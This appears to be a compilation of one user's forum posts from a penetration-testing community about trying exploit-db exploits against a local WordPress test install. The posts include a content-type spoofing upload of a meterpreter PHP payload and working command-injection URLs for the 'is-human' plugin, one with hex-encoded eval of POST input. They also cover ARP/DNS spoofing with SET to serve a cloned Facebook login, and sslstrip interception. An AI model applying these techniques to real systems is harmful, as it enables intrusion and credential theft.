I appreciate the level of confidence being shown in regards to my intellect!
The screenshot posted is the plugin functionality, and im using the plugin version specified in the exploit tturner.  I can't see where i have specified using the newest plugin version, as this obviously would be patched.

I will be trying some more and update if i find a solution.

1. I am allowed to upload .jpg/.gif etc to that folder as it is a profile picture plugin, and with regular pictures it works.  The files appear in the folder.
2. If i try upload anything else i get an error saying its the wrong format.
3. If i change the content header in the media stream upon upload (file extension is .PHP) it say that the picture was uploaded and awaiting for confirmation. Which probably means that it passed the "extension" check and all should be good. However, the file is not there.
4. I uploaded a jpg pic now, downloaded the processed picture and added my shell code to the end of it.  Using the content header i can upload it no problems.
Although it does not end up in the directory.

If you read the exploit description this upload method should work.  BUT i am doing somethig wrong ofcourse since its not working...

THANKS for all the input so far!

Hi again.

i just tested renaming the file to gif and it works.  So there is something wrong with my content type change i guess.

Hi again.  I'm trying out the exploit http://www.exploit-db.com/exploits/16181/.
I made a PHP payload in meterpreter (which works) and want to upload it to my wordpress site using the vuln described in exploit-db.

I edited the file header with the hex code provided in the exploit provided as so:


Then I'm using Webscarab to intercept the POST command and edit the content-type to "image/gif".  The file im uploading is ofcourse .php file.
The upload is somewhat successful as i don't get the usual error message telling me its the wrong filetype:



However, when checking my directory there are no files being uploaded.
Does anyone know the reason for this?  I don't think its the filesize as my payload (php) is 1.28K.  Did i miss someting?

Im thinking im missing some size definition of my picture maybe?

Hi again guys,
I tried the stuff you said and I'm somewhat convinced this should work!  However it doesn't!  I'ts most likely me doing something wrong...

I tried alot of stuff like (ipconfig):

http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x69\x6e\x63\x6c\x75\x64\x65\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x5d\x29\x3b");error

Tried both POST/GET just to check it out.
I also tried various variants of the base64 with different function calls.
Errors are turned off.

Most of the time im getting this error message:

Parse error: syntax error, unexpected '"', expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Removing apostrophes gives me:
Parse error: syntax error, unexpected T_NS_SEPARATOR, expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Any clues? 
Btw, that "HaXxd00r" was pure awesomeness =)

Hehe. Absolutely way cooler in hex!!   I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!

Great Video! Thanks.

Hi,
I'm playing around with my wordpress installation trying out various exploits found on exploit-db.  However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, i would like to get spacing in there. I tried URL encoding (likeipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could i run other types of code in there to upload php backdoor or connect and download it from ftp to webroot or similar?

Any help please?

Error message using URL encoding:

eprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Hi,
I'm wondering what is the best honeypot to date considering these criterias:
- Logging functionality
- Detection of port scans
- Exploit identification
- Notifications/alerts
- Services "offered"

We've had some strange behaviour on some of our webservers causing the systems to crash with a certain event ID which matches the behaviour of some recent exploit... So i would appreciate any good advice!

And yeah, i know you can do this by using the ettercap "autoadd" function!  But i don't want arpspoofing at all =)

Hi guys,

I've been playing around with cracking my WEP, ARPspoofing and SSLstrip, which is awesome.
However, what if i wanted to "reverse" the process to create a honeypot?  Let's say i create a WEP network, which get hacked, and i would want to identify the hacker by f.example facebook.
Having the router forward all packets incoming on port 80/443 to port 5555 on my computer running SSLstrip/ettercap, which then again forwards the traffic to port 80/443 on my router and out on the internet.  Would that work?  I would like to eliminate the ARPspoof process.

Also, does anyone have any better ideas?  I was thinking of port mirroring but that wouldnt eliminate the SSL if im not mistaken.

Maybe a simple solution is setting up a computer with 2 NIC's?

Hi,

First of all, didnt want to put this in the SET section as it seems to be a DNS problem.
When using SET with web attack (java) i can't seem to get the ARP/DNS spoofing to be stable.   I have a server running on my BT4 machine which ARP/DNS spoofs the entire subnet.  When a user enters f.example facebook the victim should be redirected to my cloned facebook server and get a java "certificate".  However, i cant seem this to work properly.  (Entering the IP works, but the ARP/DNS fails).

Im using the integrated ettercap function in SET, but when trying to recreate the scenario it failed so i tried spoofing manually with ettercap aswell.  But now i cant get it to work at all. Any clues?



Edit: My BT4 machine (not vmware) is on a WPA2 network together with a Windows 7 machine.  When performing ARP spoofing with ettercap it seems to work at random times and not very often.  Is this some wireless issue or anything else?

Ziggy: I havent been looking at anything specific yet.  Just trying to get an overview of whats out there. I would prefer something on the east coast though, such as NY or FL.

Hi,

I'm looking to take a MSc in information security or something similar. 
I live in Norway now but planning on taking my MSc in the US.
Can anybody point me in the direction of some UNI's that are well known for their courses?

Yeah i know, but I'm not sure what kind of "security" is added when you have, lets say a 2008 server with 2 NIC's (1 ext, 1 int) and you go out on the internet. And what happens if you spoof a client before logging into the domain, will you be able to sniff the password, and will it be a successfull login etc?